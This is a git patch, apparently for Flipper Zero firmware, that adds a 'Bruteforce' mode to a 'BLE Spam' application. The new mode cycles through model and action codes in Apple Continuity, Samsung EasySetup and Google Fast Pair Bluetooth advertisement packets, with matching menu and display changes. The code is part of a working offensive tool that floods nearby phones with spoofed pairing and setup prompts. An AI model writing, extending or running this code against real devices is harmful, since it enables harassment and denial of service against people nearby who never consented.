From 76131dd4aaf5390c0b483674fdea362475d5454d Mon Sep 17 00:00:00 2001 From: Willy-JL <49810075+Willy-JL@users.noreply.github.com> Date: Wed, 25 Oct 2023 00:51:45 +0100 Subject: [PATCH] BLE Spam Bruteforce model codes functionality --- applications/external/ble_spam/ble_spam.c | 37 ++++++++++++--- .../external/ble_spam/protocols/_protocols.h | 6 +++ .../external/ble_spam/protocols/continuity.c | 46 +++++++++++++++++++ .../external/ble_spam/protocols/easysetup.c | 46 +++++++++++++++++++ .../external/ble_spam/protocols/fastpair.c | 23 ++++++++++ 5 files changed, 151 insertions(+), 7 deletions(-) diff --git a/applications/external/ble_spam/ble_spam.c b/applications/external/ble_spam/ble_spam.c index 54171cec6..cd6c5d215 100644 --- a/applications/external/ble_spam/ble_spam.c +++ b/applications/external/ble_spam/ble_spam.c @@ -334,7 +334,16 @@ static void draw_callback(Canvas* canvas, void* _ctx) { char str[32]; canvas_set_font(canvas, FontBatteryPercent); - snprintf(str, sizeof(str), "%ims", delays[state->delay]); + if(payload->cfg.mode == ProtocolModeBruteforce) { + snprintf( + str, + sizeof(str), + "0x%0*lX", + payload->cfg.bruteforce.size * 2, + payload->cfg.bruteforce.current); + } else { + snprintf(str, sizeof(str), "%ims", delays[state->delay]); + } canvas_draw_str_aligned(canvas, 116, 12, AlignRight, AlignBottom, str); canvas_draw_icon(canvas, 119, 6, &I_SmallArrowUp_3x5); canvas_draw_icon(canvas, 119, 10, &I_SmallArrowDown_3x5); @@ -419,15 +428,29 @@ static bool input_callback(InputEvent* input, void* _ctx) { } break; case InputKeyUp: - if(is_attack && state->delay < COUNT_OF(delays) - 1) { - state->delay++; - if(advertising) start_blink(state); + if(is_attack) { + ProtocolCfg* _cfg = &attacks[state->index].payload.cfg; + if(_cfg->mode == ProtocolModeBruteforce) { + _cfg->bruteforce.current = + (_cfg->bruteforce.current + 1) % (1 << (_cfg->bruteforce.size * 8)); + _cfg->bruteforce.counter = 0; + } else if(state->delay < COUNT_OF(delays) - 1) { + state->delay++; + if(advertising) start_blink(state); + } } break; case InputKeyDown: - if(is_attack && state->delay > 0) { - state->delay--; - if(advertising) start_blink(state); + if(is_attack) { + ProtocolCfg* _cfg = &attacks[state->index].payload.cfg; + if(_cfg->mode == ProtocolModeBruteforce) { + _cfg->bruteforce.current = + (_cfg->bruteforce.current - 1) % (1 << (_cfg->bruteforce.size * 8)); + _cfg->bruteforce.counter = 0; + } else if(state->delay > 0) { + state->delay--; + if(advertising) start_blink(state); + } } break; case InputKeyLeft: diff --git a/applications/external/ble_spam/protocols/_protocols.h b/applications/external/ble_spam/protocols/_protocols.h index c1395dab8..5bdc91b3f 100644 --- a/applications/external/ble_spam/protocols/_protocols.h +++ b/applications/external/ble_spam/protocols/_protocols.h @@ -8,10 +8,16 @@ typedef enum { ProtocolModeRandom, ProtocolModeValue, + ProtocolModeBruteforce, } ProtocolMode; struct ProtocolCfg { ProtocolMode mode; + struct { + uint8_t counter; + uint32_t current; + uint8_t size; + } bruteforce; union { ContinuityCfg continuity; FastpairCfg fastpair; diff --git a/applications/external/ble_spam/protocols/continuity.c b/applications/external/ble_spam/protocols/continuity.c index 6a7e130e5..2391c81bf 100644 --- a/applications/external/ble_spam/protocols/continuity.c +++ b/applications/external/ble_spam/protocols/continuity.c @@ -147,6 +147,13 @@ static void make_packet(uint8_t* _size, uint8_t** _packet, ProtocolCfg* _cfg) { case ProtocolModeValue: model = cfg->data.proximity_pair.model; break; + case ProtocolModeBruteforce: + if(_cfg->bruteforce.counter++ >= 10) { + _cfg->bruteforce.counter = 0; + if(_cfg->bruteforce.current++ >= 0xFFFF) _cfg->bruteforce.current = 0x0000; + } + model = cfg->data.proximity_pair.model = _cfg->bruteforce.current; + break; } uint8_t prefix; @@ -221,6 +228,13 @@ static void make_packet(uint8_t* _size, uint8_t** _packet, ProtocolCfg* _cfg) { case ProtocolModeValue: action = cfg->data.nearby_action.action; break; + case ProtocolModeBruteforce: + if(_cfg->bruteforce.counter++ >= 10) { + _cfg->bruteforce.counter = 0; + if(_cfg->bruteforce.current++ >= 0xFF) _cfg->bruteforce.current = 0x00; + } + action = cfg->data.nearby_action.action = _cfg->bruteforce.current; + break; } uint8_t flags; @@ -424,6 +438,10 @@ static void extra_config(Ctx* ctx) { value_index = pp_models_count + 1; } break; + case ProtocolModeBruteforce: + model_name = "Bruteforce"; + value_index = pp_models_count + 1; + break; } variable_item_set_current_value_index(item, value_index); variable_item_set_current_value_text(item, model_name); @@ -486,6 +504,10 @@ static void extra_config(Ctx* ctx) { value_index = na_actions_count + 1; } break; + case ProtocolModeBruteforce: + action_name = "Bruteforce"; + value_index = na_actions_count + 1; + break; } variable_item_set_current_value_index(item, value_index); variable_item_set_current_value_text(item, action_name); @@ -550,6 +572,13 @@ static void pp_model_callback(void* _ctx, uint32_t index) { case pp_models_count + 1: scene_manager_next_scene(ctx->scene_manager, SceneContinuityPpModelCustom); break; + case pp_models_count + 2: + _cfg->mode = ProtocolModeBruteforce; + _cfg->bruteforce.counter = 0; + _cfg->bruteforce.current = cfg->data.proximity_pair.model; + _cfg->bruteforce.size = 2; + scene_manager_previous_scene(ctx->scene_manager); + break; default: _cfg->mode = ProtocolModeValue; cfg->data.proximity_pair.model = pp_models[index - 1].value; @@ -584,6 +613,11 @@ void scene_continuity_pp_model_on_enter(void* _ctx) { selected = pp_models_count + 1; } + submenu_add_item(submenu, "Bruteforce", pp_models_count + 2, pp_model_callback, ctx); + if(_cfg->mode == ProtocolModeBruteforce) { + selected = pp_models_count + 2; + } + submenu_set_selected_item(submenu, selected); view_dispatcher_switch_to_view(ctx->view_dispatcher, ViewSubmenu); @@ -733,6 +767,13 @@ static void na_action_callback(void* _ctx, uint32_t index) { case na_actions_count + 1: scene_manager_next_scene(ctx->scene_manager, SceneContinuityNaActionCustom); break; + case na_actions_count + 2: + _cfg->mode = ProtocolModeBruteforce; + _cfg->bruteforce.counter = 0; + _cfg->bruteforce.current = cfg->data.nearby_action.action; + _cfg->bruteforce.size = 1; + scene_manager_previous_scene(ctx->scene_manager); + break; default: _cfg->mode = ProtocolModeValue; cfg->data.nearby_action.action = na_actions[index - 1].value; @@ -767,6 +808,11 @@ void scene_continuity_na_action_on_enter(void* _ctx) { selected = na_actions_count + 1; } + submenu_add_item(submenu, "Bruteforce", na_actions_count + 2, na_action_callback, ctx); + if(_cfg->mode == ProtocolModeBruteforce) { + selected = na_actions_count + 2; + } + submenu_set_selected_item(submenu, selected); view_dispatcher_switch_to_view(ctx->view_dispatcher, ViewSubmenu); diff --git a/applications/external/ble_spam/protocols/easysetup.c b/applications/external/ble_spam/protocols/easysetup.c index d13083b7d..adece5472 100644 --- a/applications/external/ble_spam/protocols/easysetup.c +++ b/applications/external/ble_spam/protocols/easysetup.c @@ -106,6 +106,13 @@ void make_packet(uint8_t* out_size, uint8_t** out_packet, ProtocolCfg* _cfg) { case ProtocolModeValue: model = cfg->data.buds.model; break; + case ProtocolModeBruteforce: + if(_cfg->bruteforce.counter++ >= 10) { + _cfg->bruteforce.counter = 0; + if(_cfg->bruteforce.current++ >= 0xFFFFFF) _cfg->bruteforce.current = 0x000000; + } + model = cfg->data.buds.model = _cfg->bruteforce.current; + break; } packet[i++] = 27; // Size @@ -153,6 +160,13 @@ void make_packet(uint8_t* out_size, uint8_t** out_packet, ProtocolCfg* _cfg) { case ProtocolModeValue: model = cfg->data.watch.model; break; + case ProtocolModeBruteforce: + if(_cfg->bruteforce.counter++ >= 10) { + _cfg->bruteforce.counter = 0; + if(_cfg->bruteforce.current++ >= 0xFF) _cfg->bruteforce.current = 0x00; + } + model = cfg->data.watch.model = _cfg->bruteforce.current; + break; } packet[i++] = 14; // Size @@ -287,6 +301,10 @@ static void extra_config(Ctx* ctx) { value_index = buds_models_count + 1; } break; + case ProtocolModeBruteforce: + model_name = "Bruteforce"; + value_index = buds_models_count + 1; + break; } variable_item_set_current_value_index(item, value_index); variable_item_set_current_value_text(item, model_name); @@ -319,6 +337,10 @@ static void extra_config(Ctx* ctx) { value_index = watch_models_count + 1; } break; + case ProtocolModeBruteforce: + model_name = "Bruteforce"; + value_index = watch_models_count + 1; + break; } variable_item_set_current_value_index(item, value_index); variable_item_set_current_value_text(item, model_name); @@ -360,6 +382,13 @@ static void buds_model_callback(void* _ctx, uint32_t index) { case buds_models_count + 1: scene_manager_next_scene(ctx->scene_manager, SceneEasysetupBudsModelCustom); break; + case buds_models_count + 2: + _cfg->mode = ProtocolModeBruteforce; + _cfg->bruteforce.counter = 0; + _cfg->bruteforce.current = cfg->data.buds.model; + _cfg->bruteforce.size = 3; + scene_manager_previous_scene(ctx->scene_manager); + break; default: _cfg->mode = ProtocolModeValue; cfg->data.buds.model = buds_models[index - 1].value; @@ -394,6 +423,11 @@ void scene_easysetup_buds_model_on_enter(void* _ctx) { selected = buds_models_count + 1; } + submenu_add_item(submenu, "Bruteforce", buds_models_count + 2, buds_model_callback, ctx); + if(_cfg->mode == ProtocolModeBruteforce) { + selected = buds_models_count + 2; + } + submenu_set_selected_item(submenu, selected); view_dispatcher_switch_to_view(ctx->view_dispatcher, ViewSubmenu); @@ -455,6 +489,13 @@ static void watch_model_callback(void* _ctx, uint32_t index) { case watch_models_count + 1: scene_manager_next_scene(ctx->scene_manager, SceneEasysetupWatchModelCustom); break; + case watch_models_count + 2: + _cfg->mode = ProtocolModeBruteforce; + _cfg->bruteforce.counter = 0; + _cfg->bruteforce.current = cfg->data.watch.model; + _cfg->bruteforce.size = 1; + scene_manager_previous_scene(ctx->scene_manager); + break; default: _cfg->mode = ProtocolModeValue; cfg->data.watch.model = watch_models[index - 1].value; @@ -489,6 +530,11 @@ void scene_easysetup_watch_model_on_enter(void* _ctx) { selected = watch_models_count + 1; } + submenu_add_item(submenu, "Bruteforce", watch_models_count + 2, watch_model_callback, ctx); + if(_cfg->mode == ProtocolModeBruteforce) { + selected = watch_models_count + 2; + } + submenu_set_selected_item(submenu, selected); view_dispatcher_switch_to_view(ctx->view_dispatcher, ViewSubmenu); diff --git a/applications/external/ble_spam/protocols/fastpair.c b/applications/external/ble_spam/protocols/fastpair.c index 9ab904dc6..ef77580f6 100644 --- a/applications/external/ble_spam/protocols/fastpair.c +++ b/applications/external/ble_spam/protocols/fastpair.c @@ -63,6 +63,13 @@ static void make_packet(uint8_t* _size, uint8_t** _packet, ProtocolCfg* _cfg) { case ProtocolModeValue: model = cfg->model; break; + case ProtocolModeBruteforce: + if(_cfg->bruteforce.counter++ >= 10) { + _cfg->bruteforce.counter = 0; + if(_cfg->bruteforce.current++ >= 0xFFFFFF) _cfg->bruteforce.current = 0x000000; + } + model = cfg->model = _cfg->bruteforce.current; + break; } uint8_t size = 14; @@ -154,6 +161,10 @@ static void extra_config(Ctx* ctx) { value_index = models_count + 1; } break; + case ProtocolModeBruteforce: + model_name = "Bruteforce"; + value_index = models_count + 1; + break; } variable_item_set_current_value_index(item, value_index); variable_item_set_current_value_text(item, model_name); @@ -188,6 +199,13 @@ static void model_callback(void* _ctx, uint32_t index) { case models_count + 1: scene_manager_next_scene(ctx->scene_manager, SceneFastpairModelCustom); break; + case models_count + 2: + _cfg->mode = ProtocolModeBruteforce; + _cfg->bruteforce.counter = 0; + _cfg->bruteforce.current = cfg->model; + _cfg->bruteforce.size = 3; + scene_manager_previous_scene(ctx->scene_manager); + break; default: _cfg->mode = ProtocolModeValue; cfg->model = models[index - 1].value; @@ -221,6 +239,11 @@ void scene_fastpair_model_on_enter(void* _ctx) { selected = models_count + 1; } + submenu_add_item(submenu, "Bruteforce", models_count + 2, model_callback, ctx); + if(_cfg->mode == ProtocolModeBruteforce) { + selected = models_count + 2; + } + submenu_set_selected_item(submenu, selected); view_dispatcher_switch_to_view(ctx->view_dispatcher, ViewSubmenu);